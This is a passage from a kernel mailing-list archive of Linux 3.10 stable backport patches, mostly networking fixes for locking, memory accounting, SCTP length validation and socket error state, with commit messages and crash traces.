  Cc: Oliver Hartkopp, Marc Kleine-Budde, Willy Tarreau

From: Oliver Hartkopp <socketcan@hartkopp.net>

commit deb507f91f1adbf64317ad24ac46c56eeccfb754 upstream.

Andrey Konovalov reported an issue with proc_register in bcm.c.
As suggested by Cong Wang this patch adds a lock_sock() protection and
a check for unsuccessful proc_create_data() in bcm_connect().

Reference: http://marc.info/?l=linux-netdev&m=147732648731237

Reported-by: Andrey Konovalov <andreyknvl@google.com>
Suggested-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Oliver Hartkopp <socketcan@hartkopp.net>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marc Kleine-Budde <mkl@pengutronix.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/can/bcm.c | 32 +++++++++++++++++++++++---------
 1 file changed, 23 insertions(+), 9 deletions(-)

diff --git a/net/can/bcm.c b/net/can/bcm.c
index 35cf02d..dd0781c 100644
--- a/net/can/bcm.c
+++ b/net/can/bcm.c
@@ -1500,24 +1500,31 @@ static int bcm_connect(struct socket *sock, struct sockaddr *uaddr, int len,
 	struct sockaddr_can *addr = (struct sockaddr_can *)uaddr;
 	struct sock *sk = sock->sk;
 	struct bcm_sock *bo = bcm_sk(sk);
+	int ret = 0;
 
 	if (len < sizeof(*addr))
 		return -EINVAL;
 
-	if (bo->bound)
-		return -EISCONN;
+	lock_sock(sk);
+
+	if (bo->bound) {
+		ret = -EISCONN;
+		goto fail;
+	}
 
 	/* bind a device to this socket */
 	if (addr->can_ifindex) {
 		struct net_device *dev;
 
 		dev = dev_get_by_index(&init_net, addr->can_ifindex);
-		if (!dev)
-			return -ENODEV;
-
+		if (!dev) {
+			ret = -ENODEV;
+			goto fail;
+		}
 		if (dev->type != ARPHRD_CAN) {
 			dev_put(dev);
-			return -ENODEV;
+			ret = -ENODEV;
+			goto fail;
 		}
 
 		bo->ifindex = dev->ifindex;
@@ -1528,17 +1535,24 @@ static int bcm_connect(struct socket *sock, struct sockaddr *uaddr, int len,
 		bo->ifindex = 0;
 	}
 
-	bo->bound = 1;
-
 	if (proc_dir) {
 		/* unique socket address as filename */
 		sprintf(bo->procname, "%lu", sock_i_ino(sk));
 		bo->bcm_proc_read = proc_create_data(bo->procname, 0644,
 						     proc_dir,
 						     &bcm_proc_fops, sk);
+		if (!bo->bcm_proc_read) {
+			ret = -ENOMEM;
+			goto fail;
+		}
 	}
 
-	return 0;
+	bo->bound = 1;
+
+fail:
+	release_sock(sk);
+
+	return ret;
 }
 
 static int bcm_recvmsg(struct kiocb *iocb, struct socket *sock,
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 253/319] net: fix sk_mem_reclaim_partial()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (151 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 252/319] can: bcm: fix warning in bcm_connect/proc_register Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 254/319] net: avoid sk_forward_alloc overflows Willy Tarreau
                   ` (65 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eric Dumazet, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit 1a24e04e4b50939daa3041682b38b82c896ca438 upstream.

sk_mem_reclaim_partial() goal is to ensure each socket has
one SK_MEM_QUANTUM forward allocation. This is needed both for
performance and better handling of memory pressure situations in
follow up patches.

SK_MEM_QUANTUM is currently a page, but might be reduced to 4096 bytes
as some arches have 64KB pages.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/net/sock.h | 6 +++---
 net/core/sock.c    | 9 +++++----
 2 files changed, 8 insertions(+), 7 deletions(-)

diff --git a/include/net/sock.h b/include/net/sock.h
index 2317d12..6d2fbac 100644
--- a/include/net/sock.h
+++ b/include/net/sock.h
@@ -1358,7 +1358,7 @@ static inline struct inode *SOCK_INODE(struct socket *socket)
  * Functions for memory accounting
  */
 extern int __sk_mem_schedule(struct sock *sk, int size, int kind);
-extern void __sk_mem_reclaim(struct sock *sk);
+void __sk_mem_reclaim(struct sock *sk, int amount);
 
 #define SK_MEM_QUANTUM ((int)PAGE_SIZE)
 #define SK_MEM_QUANTUM_SHIFT ilog2(SK_MEM_QUANTUM)
@@ -1399,7 +1399,7 @@ static inline void sk_mem_reclaim(struct sock *sk)
 	if (!sk_has_account(sk))
 		return;
 	if (sk->sk_forward_alloc >= SK_MEM_QUANTUM)
-		__sk_mem_reclaim(sk);
+		__sk_mem_reclaim(sk, sk->sk_forward_alloc);
 }
 
 static inline void sk_mem_reclaim_partial(struct sock *sk)
@@ -1407,7 +1407,7 @@ static inline void sk_mem_reclaim_partial(struct sock *sk)
 	if (!sk_has_account(sk))
 		return;
 	if (sk->sk_forward_alloc > SK_MEM_QUANTUM)
-		__sk_mem_reclaim(sk);
+		__sk_mem_reclaim(sk, sk->sk_forward_alloc - 1);
 }
 
 static inline void sk_mem_charge(struct sock *sk, int size)
diff --git a/net/core/sock.c b/net/core/sock.c
index 5a954fc..6473fef 100644
--- a/net/core/sock.c
+++ b/net/core/sock.c
@@ -2048,12 +2048,13 @@ EXPORT_SYMBOL(__sk_mem_schedule);
 /**
  *	__sk_reclaim - reclaim memory_allocated
  *	@sk: socket
+ *	@amount: number of bytes (rounded down to a SK_MEM_QUANTUM multiple)
  */
-void __sk_mem_reclaim(struct sock *sk)
+void __sk_mem_reclaim(struct sock *sk, int amount)
 {
-	sk_memory_allocated_sub(sk,
-				sk->sk_forward_alloc >> SK_MEM_QUANTUM_SHIFT);
-	sk->sk_forward_alloc &= SK_MEM_QUANTUM - 1;
+	amount >>= SK_MEM_QUANTUM_SHIFT;
+	sk_memory_allocated_sub(sk, amount);
+	sk->sk_forward_alloc -= amount << SK_MEM_QUANTUM_SHIFT;
 
 	if (sk_under_memory_pressure(sk) &&
 	    (sk_memory_allocated(sk) < sk_prot_mem_limits(sk, 0)))
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 254/319] net: avoid sk_forward_alloc overflows
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (152 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 253/319] net: fix sk_mem_reclaim_partial() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 255/319] ipmr, ip6mr: fix scheduling while atomic and a deadlock with ipmr_get_route Willy Tarreau
                   ` (64 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eric Dumazet, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit 20c64d5cd5a2bdcdc8982a06cb05e5e1bd851a3d upstream.

A malicious TCP receiver, sending SACK, can force the sender to split
skbs in write queue and increase its memory usage.

Then, when socket is closed and its write queue purged, we might
overflow sk_forward_alloc (It becomes negative)

sk_mem_reclaim() does nothing in this case, and more than 2GB
are leaked from TCP perspective (tcp_memory_allocated is not changed)

Then warnings trigger from inet_sock_destruct() and
sk_stream_kill_queues() seeing a not zero sk_forward_alloc

All TCP stack can be stuck because TCP is under memory pressure.

A simple fix is to preemptively reclaim from sk_mem_uncharge().

This makes sure a socket wont have more than 2 MB forward allocated,
after burst and idle period.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/net/sock.h | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/include/net/sock.h b/include/net/sock.h
index 6d2fbac..a46dd30 100644
--- a/include/net/sock.h
+++ b/include/net/sock.h
@@ -1422,6 +1422,16 @@ static inline void sk_mem_uncharge(struct sock *sk, int size)
 	if (!sk_has_account(sk))
 		return;
 	sk->sk_forward_alloc += size;
+
+	/* Avoid a possible overflow.
+	 * TCP send queues can make this happen, if sk_mem_reclaim()
+	 * is not called and more than 2 GBytes are released at once.
+	 *
+	 * If we reach 2 MBytes, reclaim 1 MBytes right now, there is
+	 * no need to hold that much forward allocation anyway.
+	 */
+	if (unlikely(sk->sk_forward_alloc >= 1 << 21))
+		__sk_mem_reclaim(sk, 1 << 20);
 }
 
 static inline void sk_wmem_free_skb(struct sock *sk, struct sk_buff *skb)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 255/319] ipmr, ip6mr: fix scheduling while atomic and a deadlock with ipmr_get_route
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (153 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 254/319] net: avoid sk_forward_alloc overflows Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 256/319] packet: call fanout_release, while UNREGISTERING a netdev Willy Tarreau
                   ` (63 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Nikolay Aleksandrov, David S . Miller, Willy Tarreau

From: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>

commit 2cf750704bb6d7ed8c7d732e071dd1bc890ea5e8 upstream.

Since the commit below the ipmr/ip6mr rtnl_unicast() code uses the portid
instead of the previous dst_pid which was copied from in_skb's portid.
Since the skb is new the portid is 0 at that point so the packets are sent
to the kernel and we get scheduling while atomic or a deadlock (depending
on where it happens) by trying to acquire rtnl two times.
Also since this is RTM_GETROUTE, it can be triggered by a normal user.

Here's the sleeping while atomic trace:
[ 7858.212557] BUG: sleeping function called from invalid context at kernel/locking/mutex.c:620
[ 7858.212748] in_atomic(): 1, irqs_disabled(): 0, pid: 0, name: swapper/0
[ 7858.212881] 2 locks held by swapper/0/0:
[ 7858.213013]  #0:  (((&mrt->ipmr_expire_timer))){+.-...}, at: [<ffffffff810fbbf5>] call_timer_fn+0x5/0x350
[ 7858.213422]  #1:  (mfc_unres_lock){+.....}, at: [<ffffffff8161e005>] ipmr_expire_process+0x25/0x130
[ 7858.213807] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 4.8.0-rc7+ #179
[ 7858.213934] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.7.5-20140531_083030-gandalf 04/01/2014
[ 7858.214108]  0000000000000000 ffff88005b403c50 ffffffff813a7804 0000000000000000
[ 7858.214412]  ffffffff81a1338e ffff88005b403c78 ffffffff810a4a72 ffffffff81a1338e
[ 7858.214716]  000000000000026c 0000000000000000 ffff88005b403ca8 ffffffff810a4b9f
[ 7858.215251] Call Trace:
[ 7858.215412]  <IRQ>  [<ffffffff813a7804>] dump_stack+0x85/0xc1
[ 7858.215662]  [<ffffffff810a4a72>] ___might_sleep+0x192/0x250
[ 7858.215868]  [<ffffffff810a4b9f>] __might_sleep+0x6f/0x100
[ 7858.216072]  [<ffffffff8165bea3>] mutex_lock_nested+0x33/0x4d0
[ 7858.216279]  [<ffffffff815a7a5f>] ? netlink_lookup+0x25f/0x460
[ 7858.216487]  [<ffffffff8157474b>] rtnetlink_rcv+0x1b/0x40
[ 7858.216687]  [<ffffffff815a9a0c>] netlink_unicast+0x19c/0x260
[ 7858.216900]  [<ffffffff81573c70>] rtnl_unicast+0x20/0x30
[ 7858.217128]  [<ffffffff8161cd39>] ipmr_destroy_unres+0xa9/0xf0
[ 7858.217351]  [<ffffffff8161e06f>] ipmr_expire_process+0x8f/0x130
[ 7858.217581]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.217785]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.217990]  [<ffffffff810fbc95>] call_timer_fn+0xa5/0x350
[ 7858.218192]  [<ffffffff810fbbf5>] ? call_timer_fn+0x5/0x350
[ 7858.218415]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.218656]  [<ffffffff810fde10>] run_timer_softirq+0x260/0x640
[ 7858.218865]  [<ffffffff8166379b>] ? __do_softirq+0xbb/0x54f
[ 7858.219068]  [<ffffffff816637c8>] __do_softirq+0xe8/0x54f
[ 7858.219269]  [<ffffffff8107a948>] irq_exit+0xb8/0xc0
[ 7858.219463]  [<ffffffff81663452>] smp_apic_timer_interrupt+0x42/0x50
[ 7858.219678]  [<ffffffff816625bc>] apic_timer_interrupt+0x8c/0xa0
[ 7858.219897]  <EOI>  [<ffffffff81055f16>] ? native_safe_halt+0x6/0x10
[ 7858.220165]  [<ffffffff810d64dd>] ? trace_hardirqs_on+0xd/0x10
[ 7858.220373]  [<ffffffff810298e3>] default_idle+0x23/0x190
[ 7858.220574]  [<ffffffff8102a20f>] arch_cpu_idle+0xf/0x20
[ 7858.220790]  [<ffffffff810c9f8c>] default_idle_call+0x4c/0x60
[ 7858.221016]  [<ffffffff810ca33b>] cpu_startup_entry+0x39b/0x4d0
[ 7858.221257]  [<ffffffff8164f995>] rest_init+0x135/0x140
[ 7858.221469]  [<ffffffff81f83014>] start_kernel+0x50e/0x51b
[ 7858.221670]  [<ffffffff81f82120>] ? early_idt_handler_array+0x120/0x120
[ 7858.221894]  [<ffffffff81f8243f>] x86_64_start_reservations+0x2a/0x2c
[ 7858.222113]  [<ffffffff81f8257c>] x86_64_start_kernel+0x13b/0x14a

Fixes: 2942e9005056 ("[RTNETLINK]: Use rtnl_unicast() for rtnetlink unicasts")
Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/mroute.h  | 2 +-
 include/linux/mroute6.h | 2 +-
 net/ipv4/ipmr.c         | 3 ++-
 net/ipv4/route.c        | 3 ++-
 net/ipv6/ip6mr.c        | 5 +++--
 net/ipv6/route.c        | 4 +++-
 6 files changed, 12 insertions(+), 7 deletions(-)

diff --git a/include/linux/mroute.h b/include/linux/mroute.h
index 79aaa9f..d5277fc 100644
--- a/include/linux/mroute.h
+++ b/include/linux/mroute.h
@@ -103,5 +103,5 @@ struct mfc_cache {
 struct rtmsg;
 extern int ipmr_get_route(struct net *net, struct sk_buff *skb,
 			  __be32 saddr, __be32 daddr,
-			  struct rtmsg *rtm, int nowait);
+			  struct rtmsg *rtm, int nowait, u32 portid);
 #endif
diff --git a/include/linux/mroute6.h b/include/linux/mroute6.h
index 66982e7..f831155 100644
--- a/include/linux/mroute6.h
+++ b/include/linux/mroute6.h
@@ -115,7 +115,7 @@ struct mfc6_cache {
 
 struct rtmsg;
 extern int ip6mr_get_route(struct net *net, struct sk_buff *skb,
-			   struct rtmsg *rtm, int nowait);
+			   struct rtmsg *rtm, int nowait, u32 portid);
 
 #ifdef CONFIG_IPV6_MROUTE
 extern struct sock *mroute6_socket(struct net *net, struct sk_buff *skb);
diff --git a/net/ipv4/ipmr.c b/net/ipv4/ipmr.c
index 89570f0..a429ac6 100644
--- a/net/ipv4/ipmr.c
+++ b/net/ipv4/ipmr.c
@@ -2190,7 +2190,7 @@ static int __ipmr_fill_mroute(struct mr_table *mrt, struct sk_buff *skb,
 
 int ipmr_get_route(struct net *net, struct sk_buff *skb,
 		   __be32 saddr, __be32 daddr,
-		   struct rtmsg *rtm, int nowait)
+		   struct rtmsg *rtm, int nowait, u32 portid)
 {
 	struct mfc_cache *cache;
 	struct mr_table *mrt;
@@ -2235,6 +2235,7 @@ int ipmr_get_route(struct net *net, struct sk_buff *skb,
 			return -ENOMEM;
 		}
 
+		NETLINK_CB(skb2).portid = portid;
 		skb_push(skb2, sizeof(struct iphdr));
 		skb_reset_network_header(skb2);
 		iph = ip_hdr(skb2);
diff --git a/net/ipv4/route.c b/net/ipv4/route.c
index 624ca8e..93efb89 100644
--- a/net/ipv4/route.c
+++ b/net/ipv4/route.c
@@ -2325,7 +2325,8 @@ static int rt_fill_info(struct net *net,  __be32 dst, __be32 src,
 		    IPV4_DEVCONF_ALL(net, MC_FORWARDING)) {
 			int err = ipmr_get_route(net, skb,
 						 fl4->saddr, fl4->daddr,
-						 r, nowait);
+						 r, nowait, portid);
+
 			if (err <= 0) {
 				if (!nowait) {
 					if (err == 0)
diff --git a/net/ipv6/ip6mr.c b/net/ipv6/ip6mr.c
index 107f7528..8344f68 100644
--- a/net/ipv6/ip6mr.c
+++ b/net/ipv6/ip6mr.c
@@ -2275,8 +2275,8 @@ static int __ip6mr_fill_mroute(struct mr6_table *mrt, struct sk_buff *skb,
 	return 1;
 }
 
-int ip6mr_get_route(struct net *net,
-		    struct sk_buff *skb, struct rtmsg *rtm, int nowait)
+int ip6mr_get_route(struct net *net, struct sk_buff *skb, struct rtmsg *rtm,
+		    int nowait, u32 portid)
 {
 	int err;
 	struct mr6_table *mrt;
@@ -2321,6 +2321,7 @@ int ip6mr_get_route(struct net *net,
 			return -ENOMEM;
 		}
 
+		NETLINK_CB(skb2).portid = portid;
 		skb_reset_transport_header(skb2);
 
 		skb_put(skb2, sizeof(struct ipv6hdr));
diff --git a/net/ipv6/route.c b/net/ipv6/route.c
index 6ebefd4..fb5010c 100644
--- a/net/ipv6/route.c
+++ b/net/ipv6/route.c
@@ -2536,7 +2536,9 @@ static int rt6_fill_node(struct net *net,
 	if (iif) {
 #ifdef CONFIG_IPV6_MROUTE
 		if (ipv6_addr_is_multicast(&rt->rt6i_dst.addr)) {
-			int err = ip6mr_get_route(net, skb, rtm, nowait);
+			int err = ip6mr_get_route(net, skb, rtm, nowait,
+						  portid);
+
 			if (err <= 0) {
 				if (!nowait) {
 					if (err == 0)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 256/319] packet: call fanout_release, while UNREGISTERING a netdev
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (154 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 255/319] ipmr, ip6mr: fix scheduling while atomic and a deadlock with ipmr_get_route Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 257/319] net: sctp, forbid negative length Willy Tarreau
                   ` (62 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Anoob Soman, David S . Miller, Willy Tarreau

From: Anoob Soman <anoob.soman@citrix.com>

commit 6664498280cf17a59c3e7cf1a931444c02633ed1 upstream.

If a socket has FANOUT sockopt set, a new proto_hook is registered
as part of fanout_add(). When processing a NETDEV_UNREGISTER event in
af_packet, __fanout_unlink is called for all sockets, but prot_hook which was
registered as part of fanout_add is not removed. Call fanout_release, on a
NETDEV_UNREGISTER, which removes prot_hook and removes fanout from the
fanout_list.

This fixes BUG_ON(!list_empty(&dev->ptype_specific)) in netdev_run_todo()

Signed-off-by: Anoob Soman <anoob.soman@citrix.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/packet/af_packet.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
index 2d454a2..24f0066 100644
--- a/net/packet/af_packet.c
+++ b/net/packet/af_packet.c
@@ -3384,6 +3384,7 @@ static int packet_notifier(struct notifier_block *this, unsigned long msg, void
 				}
 				if (msg == NETDEV_UNREGISTER) {
 					packet_cached_dev_reset(po);
+					fanout_release(sk);
 					po->ifindex = -1;
 					if (po->prot_hook.dev)
 						dev_put(po->prot_hook.dev);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 257/319] net: sctp, forbid negative length
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (155 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 256/319] packet: call fanout_release, while UNREGISTERING a netdev Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 258/319] sctp: validate chunk len before actually using it Willy Tarreau
                   ` (61 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Jiri Slaby, Vlad Yasevich, Neil Horman, David S. Miller,
	linux-sctp, netdev, Willy Tarreau

From: Jiri Slaby <jslaby@suse.cz>

commit a4b8e71b05c27bae6bad3bdecddbc6b68a3ad8cf upstream.

Most of getsockopt handlers in net/sctp/socket.c check len against
sizeof some structure like:
        if (len < sizeof(int))
                return -EINVAL;

On the first look, the check seems to be correct. But since len is int
and sizeof returns size_t, int gets promoted to unsigned size_t too. So
the test returns false for negative lengths. Yes, (-1 < sizeof(long)) is
false.

Fix this in sctp by explicitly checking len < 0 before any getsockopt
handler is called.

Note that sctp_getsockopt_events already handled the negative case.
Since we added the < 0 check elsewhere, this one can be removed.

If not checked, this is the result:
UBSAN: Undefined behaviour in ../mm/page_alloc.c:2722:19
shift exponent 52 is too large for 32-bit type 'int'
CPU: 1 PID: 24535 Comm: syz-executor Not tainted 4.8.1-0-syzkaller #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014
 0000000000000000 ffff88006d99f2a8 ffffffffb2f7bdea 0000000041b58ab3
 ffffffffb4363c14 ffffffffb2f7bcde ffff88006d99f2d0 ffff88006d99f270
 0000000000000000 0000000000000000 0000000000000034 ffffffffb5096422
Call Trace:
 [<ffffffffb3051498>] ? __ubsan_handle_shift_out_of_bounds+0x29c/0x300
...
 [<ffffffffb273f0e4>] ? kmalloc_order+0x24/0x90
 [<ffffffffb27416a4>] ? kmalloc_order_trace+0x24/0x220
 [<ffffffffb2819a30>] ? __kmalloc+0x330/0x540
 [<ffffffffc18c25f4>] ? sctp_getsockopt_local_addrs+0x174/0xca0 [sctp]
 [<ffffffffc18d2bcd>] ? sctp_getsockopt+0x10d/0x1b0 [sctp]
 [<ffffffffb37c1219>] ? sock_common_getsockopt+0xb9/0x150
 [<ffffffffb37be2f5>] ? SyS_getsockopt+0x1a5/0x270

Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Cc: Vlad Yasevich <vyasevich@gmail.com>
Cc: Neil Horman <nhorman@tuxdriver.com>
Cc: "David S. Miller" <davem@davemloft.net>
Cc: linux-sctp@vger.kernel.org
Cc: netdev@vger.kernel.org
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/sctp/socket.c | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/net/sctp/socket.c b/net/sctp/socket.c
index bdc3fb6..86e7352 100644
--- a/net/sctp/socket.c
+++ b/net/sctp/socket.c
@@ -4259,7 +4259,7 @@ static int sctp_getsockopt_disable_fragments(struct sock *sk, int len,
 static int sctp_getsockopt_events(struct sock *sk, int len, char __user *optval,
 				  int __user *optlen)
 {
-	if (len <= 0)
+	if (len == 0)
 		return -EINVAL;
 	if (len > sizeof(struct sctp_event_subscribe))
 		len = sizeof(struct sctp_event_subscribe);
@@ -5770,6 +5770,9 @@ SCTP_STATIC int sctp_getsockopt(struct sock *sk, int level, int optname,
 	if (get_user(len, optlen))
 		return -EFAULT;
 
+	if (len < 0)
+		return -EINVAL;
+
 	sctp_lock_sock(sk);
 
 	switch (optname) {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 258/319] sctp: validate chunk len before actually using it
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (156 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 257/319] net: sctp, forbid negative length Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 259/319] net: clear sk_err_soft in sk_clone_lock() Willy Tarreau
                   ` (60 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Marcelo Ricardo Leitner, David S . Miller, Willy Tarreau

From: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>

commit bf911e985d6bbaa328c20c3e05f4eb03de11fdd6 upstream.

Andrey Konovalov reported that KASAN detected that SCTP was using a slab
beyond the boundaries. It was caused because when handling out of the
blue packets in function sctp_sf_ootb() it was checking the chunk len
only after already processing the first chunk, validating only for the
2nd and subsequent ones.

The fix is to just move the check upwards so it's also validated for the
1st chunk.

Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/sctp/sm_statefuns.c | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/net/sctp/sm_statefuns.c b/net/sctp/sm_statefuns.c
index d9cbecb..df938b2 100644
--- a/net/sctp/sm_statefuns.c
+++ b/net/sctp/sm_statefuns.c
@@ -3428,6 +3428,12 @@ sctp_disposition_t sctp_sf_ootb(struct net *net,
 			return sctp_sf_violation_chunklen(net, ep, asoc, type, arg,
 						  commands);
 
+		/* Report violation if chunk len overflows */
+		ch_end = ((__u8 *)ch) + WORD_ROUND(ntohs(ch->length));
+		if (ch_end > skb_tail_pointer(skb))
+			return sctp_sf_violation_chunklen(net, ep, asoc, type, arg,
+						  commands);
+
 		/* Now that we know we at least have a chunk header,
 		 * do things that are type appropriate.
 		 */
@@ -3459,12 +3465,6 @@ sctp_disposition_t sctp_sf_ootb(struct net *net,
 			}
 		}
 
-		/* Report violation if chunk len overflows */
-		ch_end = ((__u8 *)ch) + WORD_ROUND(ntohs(ch->length));
-		if (ch_end > skb_tail_pointer(skb))
-			return sctp_sf_violation_chunklen(net, ep, asoc, type, arg,
-						  commands);
-
 		ch = (sctp_chunkhdr_t *) ch_end;
 	} while (ch_end < skb_tail_pointer(skb));
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 259/319] net: clear sk_err_soft in sk_clone_lock()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (157 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 258/319] sctp: validate chunk len before actually using it Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 260/319] net: mangle zero checksum in skb_checksum_help() Willy Tarreau
                   ` (59 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eric Dumazet, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit e551c32d57c88923f99f8f010e89ca7ed0735e83 upstream.

At accept() time, it is possible the parent has a non zero
sk_err_soft, leftover from a prior error.

Make sure we do not leave this value in the child, as it
makes future getsockopt(SO_ERROR) calls quite unreliable.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Acked-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/core/sock.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/net/core/sock.c b/net/core/sock.c
index 6473fef..e3cb454 100644
--- a/net/core/sock.c
+++ b/net/core/sock.c
@@ -1515,6 +1515,7 @@ struct sock *sk_clone_lock(const struct sock *sk, const gfp_t priority)
 		}
 
 		newsk->sk_err	   = 0;
+		newsk->sk_err_soft = 0;
 		newsk->sk_priority = 0;
 		/*
 		 * Before updating sk_refcnt, we must commit prior changes to memory
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 260/319] net: mangle zero checksum in skb_checksum_help()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (158 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 259/319] net: clear sk_err_soft in sk_clone_lock() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 261/319] dccp: do not send reset to already closed sockets Willy Tarreau
                   ` (58 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
